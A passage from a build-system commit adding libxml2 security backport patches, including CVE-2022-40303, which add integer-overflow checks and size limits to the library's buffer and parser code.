+         ret->content = (xmlChar *) xmlMallocAtomic(ret->size * sizeof(xmlChar));
+         if (ret->content == NULL) {
+@@ -442,23 +448,17 @@ xmlBufGrowInternal(xmlBufPtr buf, size_t len) {
+     CHECK_COMPAT(buf)
+ 
+     if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return(0);
+-    if (buf->use + len < buf->size)
++    if (len < buf->size - buf->use)
+         return(buf->size - buf->use);
++    if (len > SIZE_MAX - buf->use)
++        return(0);
+ 
+-    /*
+-     * Windows has a BIG problem on realloc timing, so we try to double
+-     * the buffer size (if that's enough) (bug 146697)
+-     * Apparently BSD too, and it's probably best for linux too
+-     * On an embedded system this may be something to change
+-     */
+-#if 1
+-    if (buf->size > (size_t) len)
+-        size = buf->size * 2;
+-    else
+-        size = buf->use + len + 100;
+-#else
+-    size = buf->use + len + 100;
+-#endif
++    if (buf->size > (size_t) len) {
++        size = buf->size > SIZE_MAX / 2 ? SIZE_MAX : buf->size * 2;
++    } else {
++        size = buf->use + len;
++        size = size > SIZE_MAX - 100 ? SIZE_MAX : size + 100;
++    }
+ 
+     if (buf->alloc == XML_BUFFER_ALLOC_BOUNDED) {
+         /*
+@@ -744,7 +744,7 @@ xmlBufIsEmpty(const xmlBufPtr buf)
+ int
+ xmlBufResize(xmlBufPtr buf, size_t size)
+ {
+-    unsigned int newSize;
++    size_t newSize;
+     xmlChar* rebuf = NULL;
+     size_t start_buf;
+ 
+@@ -772,9 +772,13 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ 	case XML_BUFFER_ALLOC_IO:
+ 	case XML_BUFFER_ALLOC_DOUBLEIT:
+ 	    /*take care of empty case*/
+-	    newSize = (buf->size ? buf->size*2 : size + 10);
++            if (buf->size == 0) {
++                newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
++            } else {
++                newSize = buf->size;
++            }
+ 	    while (size > newSize) {
+-	        if (newSize > UINT_MAX / 2) {
++	        if (newSize > SIZE_MAX / 2) {
+ 	            xmlBufMemoryError(buf, "growing buffer");
+ 	            return 0;
+ 	        }
+@@ -782,15 +786,15 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ 	    }
+ 	    break;
+ 	case XML_BUFFER_ALLOC_EXACT:
+-	    newSize = size+10;
++            newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
+ 	    break;
+         case XML_BUFFER_ALLOC_HYBRID:
+             if (buf->use < BASE_BUFFER_SIZE)
+                 newSize = size;
+             else {
+-                newSize = buf->size * 2;
++                newSize = buf->size;
+                 while (size > newSize) {
+-                    if (newSize > UINT_MAX / 2) {
++                    if (newSize > SIZE_MAX / 2) {
+                         xmlBufMemoryError(buf, "growing buffer");
+                         return 0;
+                     }
+@@ -800,7 +804,7 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+             break;
+ 
+ 	default:
+-	    newSize = size+10;
++            newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
+ 	    break;
+     }
+ 
+@@ -866,7 +870,7 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+  */
+ int
+ xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {
+-    unsigned int needSize;
++    size_t needSize;
+ 
+     if ((str == NULL) || (buf == NULL) || (buf->error))
+ 	return -1;
+@@ -888,8 +892,10 @@ xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {
+     if (len < 0) return -1;
+     if (len == 0) return 0;
+ 
+-    needSize = buf->use + len + 2;
+-    if (needSize > buf->size){
++    if ((size_t) len >= buf->size - buf->use) {
++        if ((size_t) len >= SIZE_MAX - buf->use)
++            return(-1);
++        needSize = buf->use + len + 1;
+ 	if (buf->alloc == XML_BUFFER_ALLOC_BOUNDED) {
+ 	    /*
+ 	     * Used to provide parsing limits
+@@ -1025,31 +1031,7 @@ xmlBufCat(xmlBufPtr buf, const xmlChar *str) {
+  */
+ int
+ xmlBufCCat(xmlBufPtr buf, const char *str) {
+-    const char *cur;
+-
+-    if ((buf == NULL) || (buf->error))
+-        return(-1);
+-    CHECK_COMPAT(buf)
+-    if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return -1;
+-    if (str == NULL) {
+-#ifdef DEBUG_BUFFER
+-        xmlGenericError(xmlGenericErrorContext,
+-		"xmlBufCCat: str == NULL\n");
+-#endif
+-	return -1;
+-    }
+-    for (cur = str;*cur != 0;cur++) {
+-        if (buf->use  + 10 >= buf->size) {
+-            if (!xmlBufResize(buf, buf->use+10)){
+-		xmlBufMemoryError(buf, "growing buffer");
+-                return XML_ERR_NO_MEMORY;
+-            }
+-        }
+-        buf->content[buf->use++] = *cur;
+-    }
+-    buf->content[buf->use] = 0;
+-    UPDATE_COMPAT(buf)
+-    return 0;
++    return xmlBufCat(buf, (const xmlChar *) str);
+ }
+ 
+ /**
+diff --git a/tree.c b/tree.c
+index 9d94aa42..86afb7d6 100644
+--- a/tree.c
++++ b/tree.c
+@@ -7104,6 +7104,8 @@ xmlBufferPtr
+ xmlBufferCreateSize(size_t size) {
+     xmlBufferPtr ret;
+ 
++    if (size >= UINT_MAX)
++        return(NULL);
+     ret = (xmlBufferPtr) xmlMalloc(sizeof(xmlBuffer));
+     if (ret == NULL) {
+ 	xmlTreeErrMemory("creating buffer");
+@@ -7111,7 +7113,7 @@ xmlBufferCreateSize(size_t size) {
+     }
+     ret->use = 0;
+     ret->alloc = xmlBufferAllocScheme;
+-    ret->size = (size ? size+2 : 0);         /* +1 for ending null */
++    ret->size = (size ? size + 1 : 0);         /* +1 for ending null */
+     if (ret->size){
+         ret->content = (xmlChar *) xmlMallocAtomic(ret->size * sizeof(xmlChar));
+         if (ret->content == NULL) {
+@@ -7171,6 +7173,8 @@ xmlBufferCreateStatic(void *mem, size_t size) {
+ 
+     if ((mem == NULL) || (size == 0))
+         return(NULL);
++    if (size > UINT_MAX)
++        return(NULL);
+ 
+     ret = (xmlBufferPtr) xmlMalloc(sizeof(xmlBuffer));
+     if (ret == NULL) {
+@@ -7318,28 +7322,23 @@ xmlBufferShrink(xmlBufferPtr buf, unsigned int len) {
+  */
+ int
+ xmlBufferGrow(xmlBufferPtr buf, unsigned int len) {
+-    int size;
++    unsigned int size;
+     xmlChar *newbuf;
+ 
+     if (buf == NULL) return(-1);
+ 
+     if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return(0);
+-    if (len + buf->use < buf->size) return(0);
++    if (len < buf->size - buf->use)
++        return(0);
++    if (len > UINT_MAX - buf->use)
++        return(-1);
+ 
+-    /*
+-     * Windows has a BIG problem on realloc timing, so we try to double
+-     * the buffer size (if that's enough) (bug 146697)
+-     * Apparently BSD too, and it's probably best for linux too
+-     * On an embedded system this may be something to change
+-     */
+-#if 1
+-    if (buf->size > len)
+-        size = buf->size * 2;
+-    else
+-        size = buf->use + len + 100;
+-#else
+-    size = buf->use + len + 100;
+-#endif
++    if (buf->size > (size_t) len) {
++        size = buf->size > UINT_MAX / 2 ? UINT_MAX : buf->size * 2;
++    } else {
++        size = buf->use + len;
++        size = size > UINT_MAX - 100 ? UINT_MAX : size + 100;
++    }
+ 
+     if ((buf->alloc == XML_BUFFER_ALLOC_IO) && (buf->contentIO != NULL)) {
+         size_t start_buf = buf->content - buf->contentIO;
+@@ -7466,7 +7465,10 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ 	case XML_BUFFER_ALLOC_IO:
+ 	case XML_BUFFER_ALLOC_DOUBLEIT:
+ 	    /*take care of empty case*/
+-	    newSize = (buf->size ? buf->size : size + 10);
++            if (buf->size == 0)
++                newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);
++            else
++                newSize = buf->size;
+ 	    while (size > newSize) {
+ 	        if (newSize > UINT_MAX / 2) {
+ 	            xmlTreeErrMemory("growing buffer");
+@@ -7476,7 +7478,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ 	    }
+ 	    break;
+ 	case XML_BUFFER_ALLOC_EXACT:
+-	    newSize = size+10;
++	    newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);;
+ 	    break;
+         case XML_BUFFER_ALLOC_HYBRID:
+             if (buf->use < BASE_BUFFER_SIZE)
+@@ -7494,7 +7496,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+             break;
+ 
+ 	default:
+-	    newSize = size+10;
++	    newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);;
+ 	    break;
+     }
+ 
+@@ -7580,8 +7582,10 @@ xmlBufferAdd(xmlBufferPtr buf, const xmlChar *str, int len) {
+     if (len < 0) return -1;
+     if (len == 0) return 0;
+ 
+-    needSize = buf->use + len + 2;
+-    if (needSize > buf->size){
++    if ((unsigned) len >= buf->size - buf->use) {
++        if ((unsigned) len >= UINT_MAX - buf->use)
++            return XML_ERR_NO_MEMORY;
++        needSize = buf->use + len + 1;
+         if (!xmlBufferResize(buf, needSize)){
+ 	    xmlTreeErrMemory("growing buffer");
+             return XML_ERR_NO_MEMORY;
+@@ -7694,29 +7698,7 @@ xmlBufferCat(xmlBufferPtr buf, const xmlChar *str) {
+  */
+ int
+ xmlBufferCCat(xmlBufferPtr buf, const char *str) {
+-    const char *cur;
+-
+-    if (buf == NULL)
+-        return(-1);
+-    if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return -1;
+-    if (str == NULL) {
+-#ifdef DEBUG_BUFFER
+-        xmlGenericError(xmlGenericErrorContext,
+-		"xmlBufferCCat: str == NULL\n");
+-#endif
+-	return -1;
+-    }
+-    for (cur = str;*cur != 0;cur++) {
+-        if (buf->use  + 10 >= buf->size) {
+-            if (!xmlBufferResize(buf, buf->use+10)){
+-		xmlTreeErrMemory("growing buffer");
+-                return XML_ERR_NO_MEMORY;
+-            }
+-        }
+-        buf->content[buf->use++] = *cur;
+-    }
+-    buf->content[buf->use] = 0;
+-    return 0;
++    return xmlBufferCat(buf, (const xmlChar *) str);
+ }
+ 
+ /**
+-- 
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch
new file mode 100644
index 0000000000..bdb9e9eb7a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch
@@ -0,0 +1,623 @@
+From c846986356fc149915a74972bf198abc266bc2c0 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 25 Aug 2022 17:43:08 +0200
+Subject: [PATCH] [CVE-2022-40303] Fix integer overflows with XML_PARSE_HUGE
+
+Also impose size limits when XML_PARSE_HUGE is set. Limit size of names
+to XML_MAX_TEXT_LENGTH (10 million bytes) and other content to
+XML_MAX_HUGE_LENGTH (1 billion bytes).
+
+Move some the length checks to the end of the respective loop to make
+them strict.
+
+xmlParseEntityValue didn't have a length limitation at all. But without
+XML_PARSE_HUGE, this should eventually trigger an error in xmlGROW.
+
+Thanks to Maddie Stone working with Google Project Zero for the report!
+
+CVE: CVE-2022-40303
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/c846986356fc149915a74972bf198abc266bc2c0]
+Comments: Refreshed hunk
+
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ parser.c | 233 +++++++++++++++++++++++++++++--------------------------
+ 1 file changed, 121 insertions(+), 112 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index 93f031be..79479979 100644
+--- a/parser.c
++++ b/parser.c
+@@ -102,6 +102,8 @@ xmlParseElementEnd(xmlParserCtxtPtr ctxt);
+  *									*
+  ************************************************************************/
+ 
++#define XML_MAX_HUGE_LENGTH 1000000000
++
+ #define XML_PARSER_BIG_ENTITY 1000
+ #define XML_PARSER_LOT_ENTITY 5000
+ 
+@@ -552,7 +554,7 @@ xmlFatalErr(xmlParserCtxtPtr ctxt, xmlParserErrors error, const char *info)
+             errmsg = "Malformed declaration expecting version";
+             break;
+         case XML_ERR_NAME_TOO_LONG:
+-            errmsg = "Name too long use XML_PARSE_HUGE option";
++            errmsg = "Name too long";
+             break;
+ #if 0
+         case:
+@@ -3202,6 +3204,9 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+     int len = 0, l;
+     int c;
+     int count = 0;
++    int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                    XML_MAX_TEXT_LENGTH :
++                    XML_MAX_NAME_LENGTH;
+ 
+ #ifdef DEBUG
+     nbParseNameComplex++;
+@@ -3267,7 +3272,8 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+                 if (ctxt->instate == XML_PARSER_EOF)
+                     return(NULL);
+ 	    }
+-	    len += l;
++            if (len <= INT_MAX - l)
++	        len += l;
+ 	    NEXTL(l);
+ 	    c = CUR_CHAR(l);
+ 	}
+@@ -3293,13 +3299,13 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+                 if (ctxt->instate == XML_PARSER_EOF)
+                     return(NULL);
+ 	    }
+-	    len += l;
++            if (len <= INT_MAX - l)
++	        len += l;
+ 	    NEXTL(l);
+ 	    c = CUR_CHAR(l);
+ 	}
+     }
+-    if ((len > XML_MAX_NAME_LENGTH) &&
+-        ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++    if (len > maxLength) {
+         xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Name");
+         return(NULL);
+     }
+@@ -3338,7 +3344,10 @@ const xmlChar *
+ xmlParseName(xmlParserCtxtPtr ctxt) {
+     const xmlChar *in;
+     const xmlChar *ret;
+-    int count = 0;
++    size_t count = 0;
++    size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                       XML_MAX_TEXT_LENGTH :
++                       XML_MAX_NAME_LENGTH;
+ 
+     GROW;
+ 
+@@ -3362,8 +3371,7 @@ xmlParseName(xmlParserCtxtPtr ctxt) {
+ 	    in++;
+ 	if ((*in > 0) && (*in < 0x80)) {
+ 	    count = in - ctxt->input->cur;
+-            if ((count > XML_MAX_NAME_LENGTH) &&
+-                ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++            if (count > maxLength) {
+                 xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Name");
+                 return(NULL);
+             }
+@@ -3384,6 +3392,9 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
+     int len = 0, l;
+     int c;
+     int count = 0;
++    int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                    XML_MAX_TEXT_LENGTH :
++                    XML_MAX_NAME_LENGTH;
+     size_t startPosition = 0;
+ 
+ #ifdef DEBUG
+@@ -3404,17 +3415,13 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
+     while ((c != ' ') && (c != '>') && (c != '/') && /* test bigname.xml */
+ 	   (xmlIsNameChar(ctxt, c) && (c != ':'))) {
+ 	if (count++ > XML_PARSER_CHUNK_SIZE) {
+-            if ((len > XML_MAX_NAME_LENGTH) &&
+-                ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+-                xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+-                return(NULL);
+-            }
+ 	    count = 0;
+ 	    GROW;
+             if (ctxt->instate == XML_PARSER_EOF)
+                 return(NULL);
+ 	}
+-	len += l;
++        if (len <= INT_MAX - l)
++	    len += l;
+ 	NEXTL(l);
+ 	c = CUR_CHAR(l);
+ 	if (c == 0) {
+@@ -3432,8 +3439,7 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
+ 	    c = CUR_CHAR(l);
+ 	}
+     }
+-    if ((len > XML_MAX_NAME_LENGTH) &&
+-        ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++    if (len > maxLength) {
+         xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+         return(NULL);
+     }
+@@ -3459,7 +3465,10 @@ static const xmlChar *
+ xmlParseNCName(xmlParserCtxtPtr ctxt) {
+     const xmlChar *in, *e;
+     const xmlChar *ret;
+-    int count = 0;
++    size_t count = 0;
++    size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                       XML_MAX_TEXT_LENGTH :
++                       XML_MAX_NAME_LENGTH;
+ 
+ #ifdef DEBUG
+     nbParseNCName++;
+@@ -3484,8 +3493,7 @@ xmlParseNCName(xmlParserCtxtPtr ctxt) {
+ 	    goto complex;
+ 	if ((*in > 0) && (*in < 0x80)) {
+ 	    count = in - ctxt->input->cur;
+-            if ((count > XML_MAX_NAME_LENGTH) &&
+-                ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++            if (count > maxLength) {
+                 xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+                 return(NULL);
+             }
+@@ -3567,6 +3575,9 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+     const xmlChar *cur = *str;
+     int len = 0, l;
+     int c;
++    int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                    XML_MAX_TEXT_LENGTH :
++                    XML_MAX_NAME_LENGTH;
+ 
+ #ifdef DEBUG
+     nbParseStringName++;
+@@ -3602,12 +3613,6 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+ 		if (len + 10 > max) {
+ 		    xmlChar *tmp;
+ 
+-                    if ((len > XML_MAX_NAME_LENGTH) &&
+-                        ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+-                        xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+-			xmlFree(buffer);
+-                        return(NULL);
+-                    }
+ 		    max *= 2;
+ 		    tmp = (xmlChar *) xmlRealloc(buffer,
+ 			                            max * sizeof(xmlChar));
+@@ -3621,14 +3626,18 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+ 		COPY_BUF(l,buffer,len,c);
+ 		cur += l;
+ 		c = CUR_SCHAR(cur, l);
++                if (len > maxLength) {
++                    xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
++                    xmlFree(buffer);
++                    return(NULL);
++                }
+ 	    }
+ 	    buffer[len] = 0;
+ 	    *str = cur;
+ 	    return(buffer);
+ 	}
+     }
+-    if ((len > XML_MAX_NAME_LENGTH) &&
+-        ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++    if (len > maxLength) {
+         xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+         return(NULL);
+     }
+@@ -3655,6 +3664,9 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+     int len = 0, l;
+     int c;
+     int count = 0;
++    int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                    XML_MAX_TEXT_LENGTH :
++                    XML_MAX_NAME_LENGTH;
+ 
+ #ifdef DEBUG
+     nbParseNmToken++;
+@@ -3706,12 +3718,6 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ 		if (len + 10 > max) {
+ 		    xmlChar *tmp;
+ 
+-                    if ((max > XML_MAX_NAME_LENGTH) &&
+-                        ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+-                        xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
+-                        xmlFree(buffer);
+-                        return(NULL);
+-                    }
+ 		    max *= 2;
+ 		    tmp = (xmlChar *) xmlRealloc(buffer,
+ 			                            max * sizeof(xmlChar));
+@@ -3725,6 +3731,11 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ 		COPY_BUF(l,buffer,len,c);
+ 		NEXTL(l);
+ 		c = CUR_CHAR(l);
++                if (len > maxLength) {
++                    xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
++                    xmlFree(buffer);
++                    return(NULL);
++                }
+ 	    }
+ 	    buffer[len] = 0;
+ 	    return(buffer);
+@@ -3732,8 +3743,7 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+     }
+     if (len == 0)
+         return(NULL);
+-    if ((len > XML_MAX_NAME_LENGTH) &&
+-        ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++    if (len > maxLength) {
+         xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
+         return(NULL);
+     }
+@@ -3759,6 +3769,9 @@ xmlParseEntityValue(xmlParserCtxtPtr ctxt, xmlChar **orig) {
+     int len = 0;
+     int size = XML_PARSER_BUFFER_SIZE;
+     int c, l;
++    int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                    XML_MAX_HUGE_LENGTH :
++                    XML_MAX_TEXT_LENGTH;
+     xmlChar stop;
+     xmlChar *ret = NULL;
+     const xmlChar *cur = NULL;
+@@ -3818,6 +3831,12 @@ xmlParseEntityValue(xmlParserCtxtPtr ctxt, xmlChar **orig) {
+ 	    GROW;
+ 	    c = CUR_CHAR(l);
+ 	}
++
++        if (len > maxLength) {
++            xmlFatalErrMsg(ctxt, XML_ERR_ENTITY_NOT_FINISHED,
++                           "entity value too long\n");
++            goto error;
++        }
+     }
+     buf[len] = 0;
+     if (ctxt->instate == XML_PARSER_EOF)
+@@ -3905,6 +3924,9 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+     xmlChar *rep = NULL;
+     size_t len = 0;
+     size_t buf_size = 0;
++    size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                       XML_MAX_HUGE_LENGTH :
++                       XML_MAX_TEXT_LENGTH;
+     int c, l, in_space = 0;
+     xmlChar *current = NULL;
+     xmlEntityPtr ent;
+@@ -3925,16 +3925,6 @@
+     while (((NXT(0) != limit) && /* checked */
+             (IS_CHAR(c)) && (c != '<')) &&
+             (ctxt->instate != XML_PARSER_EOF)) {
+-        /*
+-         * Impose a reasonable limit on attribute size, unless XML_PARSE_HUGE
+-         * special option is given
+-         */
+-        if ((len > XML_MAX_TEXT_LENGTH) &&
+-            ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+-            xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+-                           "AttValue length too long\n");
+-            goto mem_error;
+-        }
+ 	if (c == 0) break;
+ 	if (c == '&') {
+ 	    in_space = 0;
+@@ -4093,6 +4105,11 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+ 	}
+ 	GROW;
+ 	c = CUR_CHAR(l);
++        if (len > maxLength) {
++            xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
++                           "AttValue length too long\n");
++            goto mem_error;
++        }
+     }
+     if (ctxt->instate == XML_PARSER_EOF)
+         goto error;
+@@ -4114,16 +4131,6 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+     } else
+ 	NEXT;
+ 
+-    /*
+-     * There we potentially risk an overflow, don't allow attribute value of
+-     * length more than INT_MAX it is a very reasonable assumption !
+-     */
+-    if (len >= INT_MAX) {
+-        xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+-                       "AttValue length too long\n");
+-        goto mem_error;
+-    }
+-
+     if (attlen != NULL) *attlen = (int) len;
+     return(buf);
+ 
+@@ -4194,6 +4201,9 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+     int len = 0;
+     int size = XML_PARSER_BUFFER_SIZE;
+     int cur, l;
++    int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                    XML_MAX_TEXT_LENGTH :
++                    XML_MAX_NAME_LENGTH;
+     xmlChar stop;
+     int state = ctxt->instate;
+     int count = 0;
+@@ -4221,13 +4231,6 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+ 	if (len + 5 >= size) {
+ 	    xmlChar *tmp;
+ 
+-            if ((size > XML_MAX_NAME_LENGTH) &&
+-                ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+-                xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "SystemLiteral");
+-                xmlFree(buf);
+-		ctxt->instate = (xmlParserInputState) state;
+-                return(NULL);
+-            }
+ 	    size *= 2;
+ 	    tmp = (xmlChar *) xmlRealloc(buf, size * sizeof(xmlChar));
+ 	    if (tmp == NULL) {
+@@ -4256,6 +4259,12 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+ 	    SHRINK;
+ 	    cur = CUR_CHAR(l);
+ 	}
++        if (len > maxLength) {
++            xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "SystemLiteral");
++            xmlFree(buf);
++            ctxt->instate = (xmlParserInputState) state;
++            return(NULL);
++        }
+     }
+     buf[len] = 0;
+     ctxt->instate = (xmlParserInputState) state;
+@@ -4283,6 +4292,9 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+     xmlChar *buf = NULL;
+     int len = 0;
+     int size = XML_PARSER_BUFFER_SIZE;
++    int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                    XML_MAX_TEXT_LENGTH :
++                    XML_MAX_NAME_LENGTH;
+     xmlChar cur;
+     xmlChar stop;
+     int count = 0;
+@@ -4310,12 +4322,6 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+ 	if (len + 1 >= size) {
+ 	    xmlChar *tmp;
+ 
+-            if ((size > XML_MAX_NAME_LENGTH) &&
+-                ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+-                xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Public ID");
+-                xmlFree(buf);
+-                return(NULL);
+-            }
+ 	    size *= 2;
+ 	    tmp = (xmlChar *) xmlRealloc(buf, size * sizeof(xmlChar));
+ 	    if (tmp == NULL) {
+@@ -4343,6 +4349,11 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+ 	    SHRINK;
+ 	    cur = CUR;
+ 	}
++        if (len > maxLength) {
++            xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Public ID");
++            xmlFree(buf);
++            return(NULL);
++        }
+     }
+     buf[len] = 0;
+     if (cur != stop) {
+@@ -4742,6 +4753,9 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+     int r, rl;
+     int cur, l;
+     size_t count = 0;
++    size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                       XML_MAX_HUGE_LENGTH :
++                       XML_MAX_TEXT_LENGTH;
+     int inputid;
+ 
+     inputid = ctxt->input->id;
+@@ -4787,13 +4801,6 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+ 	if ((r == '-') && (q == '-')) {
+ 	    xmlFatalErr(ctxt, XML_ERR_HYPHEN_IN_COMMENT, NULL);
+ 	}
+-        if ((len > XML_MAX_TEXT_LENGTH) &&
+-            ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+-            xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
+-                         "Comment too big found", NULL);
+-            xmlFree (buf);
+-            return;
+-        }
+ 	if (len + 5 >= size) {
+ 	    xmlChar *new_buf;
+             size_t new_size;
+@@ -4831,6 +4838,13 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+ 	    GROW;
+ 	    cur = CUR_CHAR(l);
+ 	}
++
++        if (len > maxLength) {
++            xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
++                         "Comment too big found", NULL);
++            xmlFree (buf);
++            return;
++        }
+     }
+     buf[len] = 0;
+     if (cur == 0) {
+@@ -4875,6 +4889,9 @@ xmlParseComment(xmlParserCtxtPtr ctxt) {
+     xmlChar *buf = NULL;
+     size_t size = XML_PARSER_BUFFER_SIZE;
+     size_t len = 0;
++    size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                       XML_MAX_HUGE_LENGTH :
++                       XML_MAX_TEXT_LENGTH;
+     xmlParserInputState state;
+     const xmlChar *in;
+     size_t nbchar = 0;
+@@ -4958,8 +4975,7 @@ get_more:
+ 		buf[len] = 0;
+ 	    }
+ 	}
+-        if ((len > XML_MAX_TEXT_LENGTH) &&
+-            ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++        if (len > maxLength) {
+             xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
+                          "Comment too big found", NULL);
+             xmlFree (buf);
+@@ -5159,6 +5175,9 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+     xmlChar *buf = NULL;
+     size_t len = 0;
+     size_t size = XML_PARSER_BUFFER_SIZE;
++    size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++                       XML_MAX_HUGE_LENGTH :
++                       XML_MAX_TEXT_LENGTH;
+     int cur, l;
+     const xmlChar *target;
+     xmlParserInputState state;
+@@ -5234,14 +5253,6 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+                         return;
+                     }
+ 		    count = 0;
+-                    if ((len > XML_MAX_TEXT_LENGTH) &&
+-                        ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+-                        xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+-                                          "PI %s too big found", target);
+-                        xmlFree(buf);
+-                        ctxt->instate = state;
+-                        return;
+-                    }
+ 		}
+ 		COPY_BUF(l,buf,len,cur);
+ 		NEXTL(l);
+@@ -5251,15 +5262,14 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+ 		    GROW;
+ 		    cur = CUR_CHAR(l);
+ 		}
++                if (len > maxLength) {
++                    xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
++                                      "PI %s too big found", target);
++                    xmlFree(buf);
++                    ctxt->instate = state;
++                    return;
++                }
+ 	    }
+-            if ((len > XML_MAX_TEXT_LENGTH) &&
+-                ((ctxt->options & XML_PARSE_HUGE) == 0)) {
